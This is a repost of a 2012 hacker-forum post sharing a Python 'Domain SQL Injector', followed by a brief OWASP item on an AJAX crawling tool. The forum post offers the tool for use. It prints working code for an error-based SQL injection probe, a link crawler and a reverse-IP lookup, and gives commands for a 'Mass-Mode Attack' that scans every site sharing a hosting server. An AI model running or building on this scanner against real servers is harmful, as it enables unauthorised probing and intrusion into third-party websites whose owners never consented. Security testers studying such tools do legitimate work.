2012.03.31 23:56

Domain SQL Injector - Find SQL Injection on all sites hosted on server

Hey Guys,

Sharing a private Python script - "Domain SQL Injector - Error Based SQLi Tool"

The script has the following features (a sketch of the core error-based check follows the list):
1. Crawling : it can crawl all pages on a website, or a requested number of pages
2. Reverse IP Lookup : it can find all sites hosted on a shared hosting server
3. Single-Mode Attack : crawl a single website, find SQLi, and report
4. Mass-Mode Attack : find all sites hosted on a server, crawl them one by one, find SQLi on each, and report
5. Targets can be skipped while crawling if they turn out to be too big or irrelevant. The script cannot be paused, but the current target can be skipped so the scan moves on to the next site.
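
For a sense of what the error-based test does, here is a minimal sketch: append a quote character to one parameter and look for database error signatures in the response. Everything below (function name, payload, signature list) is my own illustration, not the script's actual code.

Code:
# Minimal error-based SQLi probe (illustrative sketch only).
import urllib.request
import urllib.parse

# A few classic DB error signatures; real tools carry much larger lists.
ERROR_SIGNATURES = [
    "you have an error in your sql syntax",   # MySQL
    "unclosed quotation mark",                # MSSQL
    "quoted string not properly terminated",  # Oracle
]

def is_injectable(url, param):
    """Append a single quote to one parameter and scan the body for DB errors."""
    scheme, netloc, path, query, frag = urllib.parse.urlsplit(url)
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    params[param] = [v + "'" for v in params.get(param, [""])]
    tampered = urllib.parse.urlunsplit(
        (scheme, netloc, path, urllib.parse.urlencode(params, doseq=True), frag))
    try:
        body = urllib.request.urlopen(tampered, timeout=10).read()
    except Exception:
        return False
    body = body.decode("utf-8", "replace").lower()
    return any(sig in body for sig in ERROR_SIGNATURES)

# Hypothetical example:
# print(is_injectable("http://demo.testfire.net/listing.php?id=3", "id"))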

The script was developed as part of a penetration test assessment where a Mass-Mode attack was required per the client's request.

The Banner

Code:
# ./Domain-SQLi-finder.py


Script Help

Code:
./Domain-SQLi-finder.py -h


Single-Mode Attack - Targeting a Single Website

Code:
./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt

It crawls all pages, or the requested number of pages, finds links with injectable parameters, and tests SQLi payloads against each injectable parameter
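
The crawl-and-filter stage boils down to collecting same-host links and keeping the ones that carry query-string parameters. A rough sketch of that stage using only the standard library, standing in for the Chilkat crawler the script actually uses:

Code:
# Sketch of the crawl stage: BFS over same-host links, keeping parameterized
# URLs. Stand-in for the Chilkat crawler; not the script's actual code.
import urllib.request
from urllib.parse import urljoin, urlsplit, parse_qs
from html.parser import HTMLParser

class LinkParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

def crawl(start_url, max_pages=50):
    host = urlsplit(start_url).netloc
    queue, seen, injectable = [start_url], set(), set()
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        try:
            html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
        except Exception:
            continue
        parser = LinkParser()
        parser.feed(html)
        for href in parser.links:
            link = urljoin(url, href)
            if urlsplit(link).netloc != host:
                continue                 # stay on the target site
            if parse_qs(urlsplit(link).query):
                injectable.add(link)     # carries parameters worth testing
            if link not in seen:
                queue.append(link)
    return injectable

Each URL this returns would then be fed, parameter by parameter, into an error-based check like the one sketched earlier.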


Mass-Mode Attack - Targeting a Whole Domain


Code:
# ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt

It starts with a reverse IP lookup, if one is needed, and finds all domains hosted on the shared hosting server

In the demo run, three domains were found hosted on a single server

The script then targets each domain one by one, crawling each and testing SQLi against it
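
Conceptually, the reverse-IP stage resolves the target domain to its IP and then asks a reverse-IP service which other domains resolve to the same address. In the sketch below only the DNS resolution is real; the service endpoint, its response format, and the output file name are placeholder assumptions, since co-hosted domains can only be enumerated through a third-party service:

Code:
# Sketch of the reverse-IP lookup stage (illustrative only).
import socket
import urllib.request

# Hypothetical endpoint; real reverse-IP lookups rely on third-party services.
REVERSE_IP_API = "https://reverse-ip.example/api?ip="

def reverse_ip_lookup(domain):
    ip = socket.gethostbyname(domain)            # local DNS resolution is real
    url = REVERSE_IP_API + ip
    body = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
    # Assumed response format: one co-hosted domain per line.
    return [line.strip() for line in body.splitlines() if line.strip()]

def save_lookup(domains, path="reverse-lookup.txt"):
    # Persisting the list lets later runs skip the lookup (cf. --reverse below).
    with open(path, "w") as fh:
        fh.write("\n".join(domains))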



Usage:

--verbose : Value 0 displays only the minimum required messages; value 1 displays complete progress. By default, verbosity is OFF
--output : Output file name for the final results. If not specified, a default file named DSQLiResults.txt is created in the same directory

Single-Mode Attack:
--url : takes the target URL as input
--crawl : Number of pages on the website to crawl (default: 500). The Chilkat library is used for crawling
--pages : Number of vulnerable pages (injectable parameters) to find on the site (default: 0, i.e. try to find all possible vulnerable pages)

Mass-Mode Attack:
--durl : URL of the domain
--sites : Number of sites to scan on the domain (default: 0, i.e. scan all)
--vulsites : Number of vulnerable sites to find before scanning stops automatically (default: 0, i.e. try to find all vulnerable sites)
--dcrawl : Number of pages per site to crawl (default: 500)
--dpages : Number of vulnerable pages to find per site (default: 0, i.e. try to find all possible vulnerable pages)

--reverse : This option has a dual role

- If specified along with an output file name, the script assumes a reverse-IP lookup has already been done, i.e. a file containing the lookup results exists in the same directory, and the script just reads that file. This also means the lookup does not have to run on every invocation: generate the file once, and if you quit mid-scan, hand the script an amended lookup file next time, with the already-scanned target URLs removed from the list.
- If this option is not specified, the script performs the reverse-IP lookup itself
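
Taken together, the documented options map onto a command-line parser roughly like this reconstruction (flag names and defaults are taken from the descriptions above; the actual script's parsing code may differ):

Code:
# Reconstructed CLI skeleton based on the documented options and defaults.
import argparse

parser = argparse.ArgumentParser(
    description="Domain SQL Injector - Error Based SQLi Tool")
parser.add_argument("--verbose", type=int, choices=[0, 1], default=0,
                    help="0 = minimum messages, 1 = complete progress (default: off)")
parser.add_argument("--output", default="DSQLiResults.txt",
                    help="result file (default: DSQLiResults.txt)")

single = parser.add_argument_group("Single-Mode Attack")
single.add_argument("--url", help="target URL")
single.add_argument("--crawl", type=int, default=500,
                    help="pages to crawl (default: 500)")
single.add_argument("--pages", type=int, default=0,
                    help="vulnerable pages to find; 0 = find all")

mass = parser.add_argument_group("Mass-Mode Attack")
mass.add_argument("--durl", help="URL of the domain")
mass.add_argument("--sites", type=int, default=0, help="sites to scan; 0 = all")
mass.add_argument("--vulsites", type=int, default=0,
                  help="vulnerable sites to find before stopping; 0 = all")
mass.add_argument("--dcrawl", type=int, default=500,
                  help="pages to crawl per site (default: 500)")
mass.add_argument("--dpages", type=int, default=0,
                  help="vulnerable pages to find per site; 0 = all")
mass.add_argument("--reverse", nargs="?", const=True, default=None,
                  help="existing reverse-IP lookup file; omit to let the script do the lookup")

args = parser.parse_args()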



The script generates a few more files during scanning that serve as logs, e.g. a crawler output file, a parsed-unique-links output file, and a reverse-IP lookup output file.


Cheers!

PS: Part of the credit goes to fb1 for not coding the concept up to my requirements; otherwise I would not have coded it myself

Domain-SQLi-finder.py.txt
DomainReverseIPLookUp.py.txt


Source: garage4hackers.com



2012.01.06 18:44

OWASP AJAX Crawling Tool (update)

Enumerating AJAX Applications with ACT (AJAX Crawling Tool)




This demo shows how the AJAX Crawling Tool can be used in conjunction with your favorite proxy to fully enumerate and test AJAX applications. The purpose of the video is to:

1) Demonstrate that traditional spidering tools do not enumerate entire applications (see the sketch below)
2) Show how to run a basic ACT session and attack its findings using a proxy
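
The first point is easy to reproduce: a static fetch sees only the initial HTML, while a browser-driven crawl sees the DOM after JavaScript has run. A small illustration using requests and Selenium as stand-ins (ACT itself is a separate Java tool, so this shows the idea, not its implementation):

Code:
# Why traditional spiders miss AJAX content: the raw HTML a spider fetches
# differs from the DOM after JavaScript executes. Illustrative sketch only.
import requests
from selenium import webdriver

URL = "http://example.com/ajax-app/"  # hypothetical AJAX-heavy page

# What a traditional spider sees: the initial server response only.
static_html = requests.get(URL, timeout=10).text

# What a browser-driven crawler sees: the DOM after scripts have executed.
driver = webdriver.Firefox()
try:
    driver.get(URL)
    rendered_html = driver.page_source
finally:
    driver.quit()

# Anchors added by JavaScript exist only in the rendered DOM.
print("static links:  ", static_html.count("<a "))
print("rendered links:", rendered_html.count("<a "))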


Source: owasp.org
